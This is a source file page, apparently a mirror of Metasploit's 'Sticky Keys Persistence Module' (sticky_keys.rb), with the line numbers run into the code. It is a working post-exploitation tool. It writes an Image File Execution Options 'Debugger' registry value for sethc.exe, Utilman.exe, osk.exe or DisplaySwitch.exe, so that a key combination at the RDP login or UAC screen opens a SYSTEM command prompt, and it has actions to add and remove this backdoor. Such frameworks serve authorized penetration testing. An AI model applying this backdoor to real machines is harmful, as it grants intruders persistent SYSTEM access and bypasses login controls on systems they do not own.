Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/manage/sticky_keys.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Registry8include Msf::Post::Windows::Priv910DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'11DEBUG_REG_VALUE = 'Debugger'1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Sticky Keys Persistence Module',18'Description' => %q{19This module makes it possible to apply the 'sticky keys' hack to a session with appropriate20rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP21login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting22for certain executables.2324The module options allow for this hack to be applied to:2526SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),27UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),28OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and29DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).3031The hack can be added using the ADD action, and removed with the REMOVE action.3233Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded34to the target prior to running the module. By default, a SYSTEM command prompt is installed35using the registry method if this module is run without modifying any parameters.36},37'Author' => ['OJ Reeves'],38'Platform' => ['win'],39'SessionTypes' => ['meterpreter', 'shell'],40'Actions' => [41['ADD', { 'Description' => 'Add the backdoor to the target.' }],42['REMOVE', { 'Description' => 'Remove the backdoor from the target.' }]43],44'References' => [45['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],46['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html']47],48'DefaultAction' => 'ADD'49)50)5152register_options([53OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),54OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])55])56end5758#59# Returns the name of the executable to modify the debugger settings of.60#61def get_target_exe_name62case datastore['TARGET']63when 'UTILMAN'64'Utilman.exe'65when 'OSK'66'osk.exe'67when 'DISP'68'DisplaySwitch.exe'69else70'sethc.exe'71end72end7374#75# Returns the key combinations required to invoke the exploit once installed.76#77def get_target_key_combo78case datastore['TARGET']79when 'UTILMAN'80'WINDOWS+U'81when 'OSK'82'WINDOWS+U, then launching the on-screen keyboard'83when 'DISP'84'WINDOWS+P'85else86'SHIFT 5 times'87end88end8990#91# Returns the full path to the target's registry key based on the current target92# settings.93#94def get_target_exe_reg_key95"#{DEBUG_REG_PATH}\\#{get_target_exe_name}"96end9798#99# Runs the exploit.100#101def run102unless is_admin?103fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')104end105106print_good('Session has administrative rights, proceeding.')107108target_key = get_target_exe_reg_key109110if action.name == 'ADD'111command = expand_path(datastore['EXE'])112113registry_createkey(target_key)114registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')115116print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")117else118registry_deletekey(target_key)119print_good("'Sticky keys' removed from registry key #{target_key}.")120end121end122end123124125